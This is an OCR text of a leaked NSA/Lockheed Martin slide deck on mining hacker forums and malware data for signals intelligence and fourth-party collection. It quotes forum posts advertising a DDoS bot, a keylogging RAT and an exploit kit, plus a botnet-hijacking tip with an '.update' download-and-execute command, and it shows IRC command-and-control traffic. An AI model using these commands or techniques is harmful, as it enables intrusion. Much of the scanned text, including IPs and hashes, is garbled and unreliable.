Title: OSINT Fusion Project
Release Date: 2015-07-01
Description: This undated presentation from NSA’s UK-based Menwith Hill station describes the various uses of open source intelligence (OSINT) in computer network operations, including the monitoring of hacker forums and spotting opportunities for so-called “Fourth Party Collection”: see the Intercept article XKEYSCORE: NSA’s Google for the World’s Private Communications, 1 July 2015.
Document: TOP SECRET//COMINT//REL TO USA, FVEY
OSINT FUSION PROJECT
Lockheed Martin IS&GS Intelligence
LOCKHEED MARTIN
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
1 O C K H * K D MAP
Traditional OSINT
• Traditional OSINT is mostly from main
stream news, compiled summaries, and
information put out by venders.
- Good for situational awareness
- Some excellent analysis on attacks and
exploits
- Information can be days or weeks old
- Doesn’t normally contain strong selectors
Bp —9
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
1 O C K H * K D MAP
Research Objectives
• To compile OSINT information that
enables CNO operations & analysis
- Emerging threats
- Situational awareness
- Identification of the following:
• Victims • Capabilities
• Adversaries • Infrastructure
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
1 O C K H i K D ¡A A F
Research Objectives
• To identify strong selectors and unique
strings from OSINT that can be used
within SIGINT:
-To build XKEYSCORE Fingerprints to identify
the an adversaries capabilities being used
within SIGINT Collection
- To identify and task adversaries and their
infrastructure within SIGINT
-To identify victims for 4th Party Collection
Opportunities
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
Hacker Forums
1 D C K H i 'S D MARTIN
• A clever way to collect OSINT information
from Hacker Forums
- RSS Feeds
• Automated collection of new and historical posts
• Allows quicker analysis of posts
• Leaves no tracks on the forum unlike AIRGAP
• If enabled, can also get feeds from closed (login
required) forums.
• Enables analyst to prioritize other sites without
RSS feeds for other access operations
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY .........
Hacker Forums
• Allows for the identification of:
- Adversaries
• Those who are building capabilities
• Those who are selling capabilities
• Those who are using the capabilities
• Those who are selling information (Cyber Crime)
- Capabilities
• Profiling and understanding of emerging tactics, techniques,
and procedures used by our adversaries
• Identification of locations where capabilities can be obtained
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
Hacker Forums
BalckEnergy DDoS Bot
by kmv9Q0
nuclear stealth mechanisms fludery support multitargeting and multirezolving - if the purpose for the attack indicates
the domain name is created by a group of flows to attack each IP-address attached to this domain (rezolving
repeated every 15 minutes)
1 D C K H i 'S D A4 A ft r t M
[RAT] Slayer61 S's RAT 1.2 Final
by slayeroi 6
Hey Guys,
i completed the first Final Build. After some hard work i fixed like 20 lillle Bugs and added Keylogging Function +• Bettor GUI
-+■ Flag System!
ScreenShct:
.V WVW\l'i,i mmV WVi*.1 ' W V* *»•» 'fc
E3- SlayerG16*s Reverse Administrator' - Listening on Port: 1234 '
... 1 V.V * *. .•A1.1« . .* \\W.’. .V.V. . . .* ‘ '
mmm
'■\r
Bundles exploit [yes Exploit SystemJ
by Saint
Welcome forumchan!
Sell sploitov ligament.
Test mix, ¡frame traffic:
Your browser version orob va Percent
inte-net Explorer 5.0 - 50-75%
riternet Explorer 5.1 - 50-75%
nte-net Explorer 5.5 - 80-90%
Internet Explorer 6.0 - 35-59%
Internet Explorer 7.0 - 10-15%
nte'net Explorer 6 0 - 5-10%
Opera 9.0-9.25 - 75 80%
Opera 9.5x-9.6x -10-15%
Opera 10.0 -8-10%
F leFux 1 .X - 15-20%
F reFox 2.X - 10-15%
f ¡reí ox 3.X- 10%
,Vo?il a 5.x - 5-8%
Create a Zip Bomb - Zip of Death
Posted by X.E.R.O
A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or
render useless the program or system reading it. It is often used by virus writers to
disable antivirus software, so that a more traditional virus sent afterwards could get into
system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for
ease of transport and to avoid suspicion. However, when the file is unpacked its contents
are more than the system can handle. You can make your own zip bomb to annoy your
friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don't
detonate it on yourself.
TOP SECRET//COMINT//REL TO USA, FVEY
J
TOP SECRET//COMINT//REL TO USA, FVEY
Hacker Forums
O The following Host Name was requested from a host database;
► m, DRD3H.COM
was
rnote Host Port Nu
rn.DRD3H.COM 6668
0 There
attempt to establish co
m*® Outbound traffic (potentially malicious)
* f
G Attention! There was a new co
:Cfob-36570.5344
ussmssr Cbb-o¿s?os34-i
__
• XU clc dcj.ia.;- s
irere*sr yourserver.
/server Iwiiats
herel in your IRC
client
Make your nick similar
nnection details .
ed outbo
USER cunxdaotrxay 0 O : Cbh~
U5KFJH0ST Cbb-526873443
theres me channel and
y Heuristics Analysis n|j
TOP SECRET//COMINT//REL TO USA, FVEY
J
TOP SECRET//COMINT//REL TO USA, FVEY
Hacker Forums
1 D C K H i 'S D MARTIN
You need 10 be operator to set the topic. Default password is /oper foo bar; blit if they have changed it, DDoS attack it with your bots
and make sure that you are the first to join!
if you happen to get into a channel with a ton of bots, and the op isnt there, change your nick to a bot's name, or similar, and wait.
They should type like .login
thats when you do the same! haha.
type .login
then .update http://www.somehost.CQni/YOurfilc.cxe
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
Malicious Emails
1 D C K H i * D MARTIN
• Leverage OSINT to identify the
infrastructure and source of top virus email
senders by IP address
- Based on CISCO IronPort view of 25-30% of
the worlds email
- Identifies infrastructure used by adversaries to
deliver capability
-Allows SIGINT profiling of activity on the IP
Bp —9
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
Malicious Emails
1 D C K H i 'S D MARTIN
Tcp IOC virus genders by ip address for the last day 10 MAY 20C9
I? Address Hostname FWÖ / Rev DNS Volume vol change vs. Avg Network Owner
216.34.181.68 mx.sourceforge.net Y 0.241929 -24.1762 SAWIS Communications Corporation
217.67.228.225 hosted.by.dwsmedia.net 0.14969 490.542 Standby Power B.V. range
210.210.14S.51 mx-corp3-out.cbn.net.id Y 0.040585 -60.33 PT Cyberindo Aditama
59.95.152.42 0.0212589 -28.3654 NIB (National Internet Backbone)
59.7.203.227 mail.allisports.com M 0.0159881 259.837 AST Dew Tour
75.19.187.14 adsl-75-19-187 -14.dsl.bltnin.sbcglobal.net 0.0158124 430.639 STEELE BEARD ELECTRIC CO
56.191.129.7 sparachkmxll.k-opti.com Y 0.0130013 -54.3573 K-opticom corporation
125.189.230.12C 0.0115957 735.999 156.623 P0W2RC0MK PouncHost Internet Services
92.48.118.137 victorious.eukhost.com 0.0105416
203.188.255.3 dhaka.bangla.ne t Y 0. C101902 -11.9755 Information Services Network
196.211.9.26 0.00773049 22.2103 Internet Solutions
60.25C.154.181 Y 0.00667633 -86.6825 CHTD, Chunghwa Telecom Co., Ltd.
194.228.41.114 relsy.iol.es Y 0.00650064 -63.7897 Czech Telecom a.c.
121.189.63.190 0.00614925 -9.34094 Korea Telecom
71.34.227.194 mail.vesd.net 0.00527079 166 CHARTER COMMUNICATIONS
37.118.148.35 sh-148-035.eg.del.bg 0.0050951 961.184 Davidov Met PI space
|HU
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
1 O C K H * K D MAP
Malicious Connections
• An effort to identify the latest emerging
threats that are not yet detected by anti-
virus or IDS/IPS signatures
- Malicious Binary MD5 (track capability)
-The adversaries infrastructure that exploited
systems connect to after being compromised
-Traffic generated by compromised systems to
build XKEYSCORE fingerprints
Bp —9
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
LOCKHEED MARTIN
Malicious Connections
18 MAY 2009
Tile following "call home" IPs/Domains should. he considered
Enalicious and connectivity to them should be investigated.
Systems initiating a. connection with, these IPs/Domains
should Ibe t are a ted as compromised until tj
reviewed. POC:
File ME) 5 : OxAlBFF64FE8CB692A8F1F1DDFE7 6510 7F
File SIIA-X: OxlDEC6Bl 8SD45 6EBB3F6 2 9E5C2 4 4 0C10BF2 8DC6 9 0
Filesize: 108,032 bytes
Category : A malicious trojan horse or hot that, may
represent security risk for the compromised system and/or
its network environment
Tine following Host Name was requested from a host database:
- hf . bux'imche . net
Tirera was registered attempt to establish connection with
tire remote host . The connection details acre :
Remote Host Port Number
hf . burimche . not 4244
There was a new connection established with, a remote IRC
Server . The generated outbound IRC traffic is provi de.d
belowt
PASS bf NICK [00[USA|030685] UStiR XP — 0 4 4 2 * O : COMPUTERMAMR
TOP SECRET//C0MINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
1 O C K H * K D MAP
Malicious Connections
• NTOC - Signatures for Sensors
- BLUESASH
- TUTELAGE (TURBULENCE Defensive)
- CROSSBONES
• NSATAO/GCHQCNE-Counter CNE Ops
• MHS / NDIST - 4th Party Collection
• JCMA Cyber - Customer focused CND
• GOVCERT UK-UK Government CND
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY ......... ...ïttt#
Malicious Connections
• (U//FOUO) The following statistics show the number of NTOC DNS
Alerts that were an exact match for a malicious connection reported in
the MHSCNO Malicious Connections Report.
• Date Total DNS Alerts Exact MCR Match Percentage
• 5/14/09 22 13 59%
• 5/13/09 23 11 47%
• 5/12/09 23 10 43%
• 5/11 /09 21 11 52%
• 5/10/09 51 44 86%
• 5/09/09 12 8 67%
• 5/08/09 52 44 85%
• 5/07/09 84 75 89%
• 5/06/09 20 14 70%
• 5/04/09 107 66 62%
• 5/03/09 1 1 100%
• 5/01 /09 77 74 96%
• 4/30/09 82 71 87%
• 4/29/09 80 73 91%
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
1 O C K H * K D MAP
Malicious Connections
• US/UK/AU Government Email addresses
passed to exploit server - 17 email accounts
- Discovered using an MHS developed XKEYSCORE
Fingerprint that was written to identify a malicious
connection while searching for MENA 4th Party
Collection opportunities.
h
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
1 O C K H * K D MAP
ShadowServer Data
• Sinkhole HTTP Drone Report - All the IP
addresses that joined the sinkhole server that did
not join via a referral URL. Since the Sinkhole server
is only accessed through previously malicious
domain names only infected systems are in the
report.
- Victims / Infrastructure / HTTP Command Strings
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
1 O C K H * K D MAP
ShadowServer Data
* Sandbox URL Report - These are URLs that were
access by malware.
- Binary MD5 Hashes / Infrastructure / HTTP Command
Strings
* Botnet Drone Report - All the IP addresses that
were seen joining a known Botnet Command and
Control Server.
- Victims / Infrastructure
• 25 US Government (Federal / State / Local) systems
communicating with botnets between 5-7 June 2009
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
1 O C K H * K D MAP
ShadowServer Data
* Botnet URL Report - Any URL that was seen in a
botnet channel is reported. The URL could be an
update, complaint, or information related to the
criminals. Everything is included in case there is
something of value in the URL.
- Infrastructure / Capabilities / HTTP Command Strings
• DDoS Report - Any DDoS attack is reported
whether the country is the target or the source of the
attack.
- Victims / Infrastructure / Capabilities
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
State Sponsored
1 D C K H i 'S D MARTIN
• Example 1 (FBI CN Intrusion Set)
- Identified MALWARE report for known
domain.
- Found another binary which was an exact
match that revealed a previously
unassociated domain to this intrusion set 9
months before first known activity of this
intrusion set.
• Infrastructure / Registration / Timeline / MD5 hash
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
State Sponsored
1 D C K H i * D MARTIN
• Example 2 (JTF-GNO CN Intrusion Set)
- 6 different reports noted the use of a specific
Chinese developed standalone web server
software package.
- Identified 3 new binaries in OSINT malware
research that also used this exact software
package.
• 3 new domains (infrastructure / registration / time
line / MD5 Hashes)
TOP SECRET//COMINT//REL TO USA, FVEY
TOP SECRET//COMINT//REL TO USA, FVEY
State Sponsored
1 D C K H i * D MARTIN
• Example 3 (NSA CN Intrusion Set)
- Identified 2 binaries in OSINT that matched
those called out in a report with their
associated malware analysis and MD5
hashes.
h
TOP SECRET//COMINT//REL TO USA, FVEY
J
TOP SECRET//COMINT//REL TO USA, FVEY
lOCKHSWD !A A R 7 l Si '
Questions?